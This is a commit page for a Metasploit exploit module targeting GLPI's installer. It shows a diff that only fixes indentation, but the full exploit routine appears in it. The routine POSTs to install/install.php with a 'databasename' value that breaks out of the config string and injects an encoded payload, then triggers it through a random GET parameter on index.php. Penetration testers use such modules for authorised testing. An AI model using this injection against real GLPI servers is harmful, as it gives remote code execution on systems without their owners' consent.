corrected indentation bug

2013-09-19 20:14:07 +02:00 · 2013-09-19 20:14:07 +02:00 · ce8e94b5fe
parent f9617e351d
commit ce8e94b5fe
1 changed files with 28 additions and 28 deletions
--- a/modules/exploits/multi/php/glpi_install_rce.rb
+++ b/modules/exploits/multi/php/glpi_install_rce.rb
@ -45,15 +45,15 @@ class Metasploit3 < Msf::Exploit::Remote
          ], self.class)
  end
-	def check
+  def check
    # Check if the GLPI instance is vulnerable
-		uri = target_uri.path
+    uri = target_uri.path
-		uri << '/' if uri[-1,1] != '/'
+    uri << '/' if uri[-1,1] != '/'
-		res = send_request_cgi({
+    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(uri, 'index.php'),
-		})
+    })
    if res and res.code == 200
      re='(version)(\\s+)(.*)(\\s+)(Copyright)'
@ -80,29 +80,29 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
  def exploit
-      uri = target_uri.path
+    uri = target_uri.path
-      rand_arg = Rex::Text.rand_text_hex(10)
+    rand_arg = Rex::Text.rand_text_hex(10)
-      send_request_cgi({
+    send_request_cgi({
-        'method'    => 'POST',
+      'method'    => 'POST',
-        'uri'       => normalize_uri(uri, 'install/install.php'),
+      'uri'       => normalize_uri(uri, 'install/install.php'),
-        'vars_post' =>
+      'vars_post' =>
-        {
+      {
-          'install'=>'update_1',
+        'install'=>'update_1',
-          'db_host'=>'localhost',
+        'db_host'=>'localhost',
-          'db_user'=>'root',
+        'db_user'=>'root',
-          'db_pass'=>'root',
+        'db_pass'=>'root',
-          'databasename'=>"'; } if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } /*"
+        'databasename'=>"'; } if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } /*"
-        }
+      }
-         })
+       })
-      send_request_cgi(
+    send_request_cgi(
-        opts={
+      opts={
-          'method'    => 'GET',
+        'method'    => 'GET',
-          'uri'       => normalize_uri(uri, 'index.php'),
+        'uri'       => normalize_uri(uri, 'index.php'),
-          'vars_get'  =>
+        'vars_get'  =>
-          {
+        {
-            rand_arg => '1',
+          rand_arg => '1',
-          }
+        }
-        })
+      })
  end
 end